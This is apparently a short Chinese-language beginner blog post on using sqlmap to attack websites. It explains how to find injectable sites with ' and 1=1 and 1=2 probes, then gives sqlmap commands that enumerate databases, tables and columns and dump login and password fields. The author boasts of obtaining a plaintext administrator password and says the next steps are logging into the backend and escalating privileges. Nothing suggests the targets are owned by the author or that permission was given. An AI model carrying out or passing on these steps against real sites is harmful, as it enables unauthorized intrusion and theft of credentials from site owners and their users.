盒子
盒子
文章目录
  1. I、查看数据库系统信息
  2. II、查看数据库表
  3. III、查看表字段
  4. IV、查看数据

第一次使用 sqlmap

本人菜鸟一枚,第一次使用sqlmap,大神误入
准备工作:使用 ‘ and 1=1 and 1=2 找到可能存在sql注入的网站

I、查看数据库系统信息

在终端输入

1
sqlmap -u url --dbs --current-user

说明:url 换成你之前找到的可能存在sql注入的网址 ,文中的url都是这样,不在赘述

II、查看数据库表

1
sqlmap -u -url --tables

会出现一个错误,询问是否使用常用的表来 查询数据库表,选择 y
sqlmap 会加载常用的数据库表命名字典,使用其中的表名执行sql语句,判断数据库中是否存在相应的表名

输入运行的线程数,这个数字任意

期间可能会出现请求超时的情况,不用管,sqlmap会自动再次请求,直接等结果

查询出两张表,可能数据库中不止这两张表

III、查看表字段

1
sqlmap -u url -T uname --columns

说明:uname是上面查询出来的其中一张表

IV、查看数据

1
sqlmap -u -url -T uname -C login_name,pass,username --dump

发现密码竟然是明文,得到管理员账号和密码了。。。。。。。
后续就是找后台地址,登录,然后继续提权,就不介绍了

支持一下
走过的,路过的,请支持一下我 n(*≧▽≦*)n